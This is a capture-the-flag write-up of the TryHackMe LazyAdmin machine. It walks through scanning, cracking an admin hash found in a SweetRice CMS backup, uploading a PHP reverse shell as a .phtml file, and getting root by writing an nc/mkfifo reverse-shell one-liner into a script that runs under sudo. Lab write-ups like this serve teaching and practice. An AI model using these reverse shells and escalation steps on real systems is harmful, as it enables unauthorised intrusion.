Today we are in a new post and this time solving the machine LazyAdmin on THM.
This is an easy level machine. So let’s start connect to our THM OpenVPN network and start hacking!
Task 1 – Lazy Admin
Let’s start with get some information about the target.
I’ll start with ping to the target, to check communication and to see which machine it is.
ping -c 1 <machine_ip>
And you can see that there is a connection and it is a Linux machine.
Let’s try to scan the network using nmap tool.
Nmap Scan:
We will use the T1595: Active Scanning (MITRE ATT&CK) technique to gather information that can be useful to us.
nmap -vvv -Pn -sCV -p0-65535 -reason -oN lazyadmin.nmap <machine_ip>
You can see that there are 2 open ports.
Let’s try to access the address on the web browser.
It looks like there is nothing on the site.
Let’s see if we can find something with the gobuster tool.
Gobuster:
We will use the T1083: File and Directory Discovery (MITRE ATT&CK) technique to find directories on the web server using the GoBuster tool.
You can see that there is an interesting folder worth checking out.
Navigate to the interesting directory in the URL http://<machine_ip>/content/
We got a webpage of CMS SweetRice it is management system for managing websites.
Let’s run gobuster on this directory to see if there is something interesting.
You can see some interesting directories here.
Let’s try to access each of them and look for something interesting.
And we seem to have found something quite interesting.
Let’s download this SQL file by clicking on it.
Now let’s start reading the file carefully with the less command.
And we’ll see if there’s anything interesting.
As you can see we have found some interesting things, manager, admin, passwd and hash.
Let’s use the T1110.002: Brute Force Password Cracking (MITRE ATT&CK) technique with the online password hash cracking crackstation tool.
As you can see the password to admin or manager is ***********.
The other interesting directory we found earlier is as.
Let’s go to the address we found and try to connect with the username admin or manager and with the password we found.
The connection seems to have worked.
Now we need to see if there is anything that can be exploited.
From what I have seen we can upload a file in data section.
Thinking about what I think? Upload a php file that contains a reverse shell.
I usually use pentestmonkey to try get reverse shell using netcat.
Git clone to download the script in terminal:
git clone https://github.com/pentestmonkey/php-reverse-shell.git
Change your directory to the php-reverse-shell folder and make your php-reverse-shell script executable by using the chmod +x command.
Open the php reverse shell script in editor and change the $ip parameter’s value and $port parameter’s value to your host machine’s IP and port you want to listen on.
Now you have configured the script. We will proceed further and upload the file.
After trying to upload the script, it’ll not upload anything.
Because probably php files are not enabled.
php-revere-shell.php
From my experience you can try to upload .phtml and it’ll most likely upload the file. If you want to try feel free to try the T1110: Brute Force (MITER ATT&CK) technique with BurpSuite tool as I explained in my previous Write-up for the RootMe machine.
Let’s go back to where we found the mysql backup file.
Now we need to start a listener on netcat. I am using 1234 port and I have already inserted the same port and host IP of my machine in the script that we edited and uploaded.
netcat:
Now we have to gain shell by executing the uploaded script in the http:///<machine_ip>/content/inc/mysql_backup directory that we found earlier (see above).
Just click on php-revere-shell.phtml file and check back your netcat listener.
You can see we got a shell, which didn’t look good.
So we’re going to upgrade our shell via python.
Python:
We can check if we have python using the which command.
After seeing that we have python, it’s time to upgrade our shell.
You can see we were able to upgrade our shell.
We will try to search for the user.txt file using find command.
find / -iname user.txt -exec wc {} \;
Let’s navigate to that folder and try to read the user.txt file using the cat command.
#1.1 What is the user flag?
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
Now for root we need to do privilege escalation, so we will try sudo -l command.
You can see something quite interesting, there is a script (perl script) that can be run as root.
But it doesn’t look like we have writing permissions to it.
But when reading the script it seems that there is a file somewhere we have write permissions to it.
All we have to do is basically put a revere-shell into it and listening with netcat.
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.x.x.x 4555 >/tmp/f” > copy.sh
Now we need to start a listener on netcat, I am using port 4555.
Now run the perl script we found earlier.
Now go back to the machine we listened to and take a look at this amazing thing.
#1.1 What is the root flag?
THM{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
Hope you enjoyed, I really enjoyed.
Feel free to comment.
-Chai Geydarov